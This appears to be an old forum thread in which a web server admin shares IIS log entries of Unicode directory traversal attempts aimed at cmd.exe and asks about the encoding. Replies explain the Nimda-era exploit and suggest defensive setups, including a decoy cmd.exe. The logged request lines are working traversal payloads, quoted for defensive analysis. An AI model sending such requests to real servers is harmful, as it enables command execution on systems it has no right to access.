Have I been missing something?????
While this is a standard attempt at directory traversal I have never noticed this particular strings, ("ø€€€¯") in the attempt. Is this new or have I just not been graced by this little nasty before? Or are my powers of observation failing....... :o
2003-05-01 05:50:51 Daemon.Info XXX.XXX.XXX.XXX May 1 05:50:51 My Server <009>2003-05-01 09:50:49 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2003-05-01 05:50:51 Daemon.Info XXX.XXX.XXX.XXX May 1 05:50:51 My Server <009>2003-05-01 09:50:50 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2003-05-01 05:51:01 Daemon.Info XXX.XXX.XXX.XXX May 1 05:51:01 My Server <009>2003-05-01 09:50:57 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2003-05-01 05:51:01 Daemon.Info XXX.XXX.XXX.XXX May 1 05:51:01 My Server <009>2003-05-01 09:50:58 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2003-05-01 05:51:06 Daemon.Info XXX.XXX.XXX.XXX May 1 05:51:06 My Server <009>2003-05-01 09:51:01 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
Re: Have I been missing something?????
It's probably a unicode string. Something like %c1%c9 will create these characters. It's know as the unicode exploit and virusses like Nimda use it to break out of the webroot and into your winnt directory.
Unfortunately unicode has several different encodings for / and \ . Someone is probably using a different set then usual to evade detection by IDS's.
Simpel trick to thwart Nimda
Just a quick and simpel tip:
Install Windows+IIS like you normaly would on c:
Go to the Internet Information Server admin tool.
Disable the default web site.
Create a new web site and set it's webroot on D: (or any other drive except c: )
Tada. Nimda can still break out of the webroot but there's no way to get to the winnt dir. So nimda cannot do any damage. This also prevents future (still to be found) ../ tricks.
I've use this trick to catch some ugly users.
On D: I created the same structure as on c: ( \inetpub\wwwroot )
Also on D: I created a winnt\system32 dir. Then I made a simpel executable, named it cmd.exe and put it in d:\winnt\system32. When someone uses the unicode exploit. They get *my* executable and not the real cmd.exe. It just showed a simpel html message stating they were logged and would be hunted down. It scared the **** out of them ;)